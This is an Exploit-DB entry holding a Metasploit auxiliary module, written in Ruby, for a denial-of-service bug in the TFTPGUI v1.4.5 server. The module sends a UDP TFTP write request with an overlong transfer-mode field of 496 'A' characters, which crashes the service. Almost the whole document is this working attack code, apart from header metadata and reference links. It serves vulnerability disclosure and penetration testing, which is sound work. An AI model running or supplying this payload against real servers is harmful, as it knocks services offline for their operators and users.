# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow# EDB-ID: 12482# CVE-ID: ()# OSVDB-ID: ()# Author: Jeremiah Talamantes# Published: 2010-05-02# Verified: yes### This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/ ###### TFTPGUI v1.4.5 Long Transport Mode Overflow## Tested on: Windows XP, SP2 (EN)## Date tested: 5/2/2010### |~Greetz to Devin @ infointox.net~|## Discovered by: Jeremiah Talamantes# RedTeam Security# http://www.redteamsecure.com##
require 'msf/core'class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,'Name' => 'TFTPGUI v1.4.5 Long Transport Mode Overflow','Description'=> %q{
The TFTPUtil GUI server version 1.4.5 can be
DOSed by sending a specially crafted request. Discovered by
Jeremiah Talamantes at RedTeam Security.
Greetz to Devin @ infointox.net.},'Author' => 'Jeremiah Talamantes (RedTeam Security)','License'=> MSF_LICENSE,'Version'=> '$Revision: 9179 $','References' =>
[['URL','http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'],['URL','http://www.exploit-db.com/exploits/12482'],['URL','https://www.securityfocus.com/bid/39872'],],'DisclosureDate' => 'May 02 2010'))
register_options([Opt::RPORT(69)])end
def run
connect_udp
print_status("Sending naughty request...")$fn = "A"$md = "A"* 496
$stuff = "\00\x02"+$fn+"\0"+$md+"\0"
udp_sock.put($stuff)
disconnect_udp
endend
